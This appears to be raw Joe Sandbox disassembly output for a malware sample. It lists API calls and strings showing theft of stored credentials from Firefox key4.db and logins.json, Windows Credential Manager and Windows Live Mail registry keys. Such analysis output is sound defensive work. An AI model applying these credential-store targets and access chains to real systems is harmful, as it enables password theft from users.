                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                                                                                                                      • , xrefs: 00406834
                                                                                                                                                                                                                                      • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                                                                                                      • key4.db, xrefs: 00406756
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                                                                                                      • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A973
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A996
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A9AC
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A9BC
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040A9F0
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040AABE
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040AAED
                                                                                                                                                                                                                                        • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040AB21
                                                                                                                                                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`-v,00000000,?,?,0040A7BE,00000001,0044CBC0,762D0A60), ref: 00406D4D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                                                                                                        • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                                                                                                                                                        • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                                                                                                                                        • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                                                                                                                                        • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                                                                        • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F139
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F147
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F187
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F196
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F1EA
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F207
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                                                                                                                                      • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C3F7
                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                                                                                                                                      • strrchr.MSVCRT ref: 0040C417
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040C431
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                                                                                                                                      • GetWindowPlacement.USER32(?,?), ref: 0040C50C
Memory Dump Source
• Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                                                                      • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444612
                                                                                                                                                                                                                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0044462E
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444668
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044467C
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444690
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004446B6
                                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                                                                      • String ID: salu
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00443AD2
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443B2E
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443B4B
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                                                                                                                                                                        • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                                                                                                                                                                      • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                                                                                                                                                                      • Salt, xrefs: 00443BA7
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                                                                                                                                                      • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                                                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                                                                      • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                                                                                                                                                                                      • API String ID: 551151806-1288872324
                                                                                                                                                                                                                                      • Opcode ID: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                                                                                                                                                                      • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040957B
                                                                                                                                                                                                                                      • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                                                                                                                                        • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                                                                                                                                        • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                                                                                                                                        • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                                                                                                                                        • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                                                                                                                                      • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 004095EB
                                                                                                                                                                                                                                      • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040961C
                                                                                                                                                                                                                                      • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                                                                                                                                      • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                                                                      • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                                                                      • API String ID: 3259144588-3822380221
                                                                                                                                                                                                                                      • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                                                                                                                                                      • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                                      • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                                                                      • API String ID: 2449869053-4258758744
                                                                                                                                                                                                                                      • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                                                                      • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcsstr.MSVCRT ref: 0040426A
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 004042F6
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040430A
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040432B
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040433C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                                                                      • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                                                                      • API String ID: 3866421160-4070641962
                                                                                                                                                                                                                                      • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                                                                                                                                                      • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409749
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409759
                                                                                                                                                                                                                                        • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                                                                                                                                        • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,00000104,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                                                                                                                                        • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(00000104,00000004,0040955A,00000000), ref: 0040978F
                                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(00000104,00000005,0040955A,00000000), ref: 00409799
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A550,strings,?,00409862,00000000,?,00000000,00000104,?), ref: 004097A1
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004097BD
                                                                                                                                                                                                                                      • LoadStringA.USER32(00000104,00000000,?,00001000), ref: 004097D1
                                                                                                                                                                                                                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                                                                      • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                                                                      • API String ID: 1035899707-3647959541
                                                                                                                                                                                                                                      • Opcode ID: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                                                                                                                                                      • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                                                                                                                                                      • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                                                                                                                                                        • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                                                                                                                                                        • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                                                                                                                                                        • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                                                                                                                                                      • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                                                                                                                                                      • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0040CB92
                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
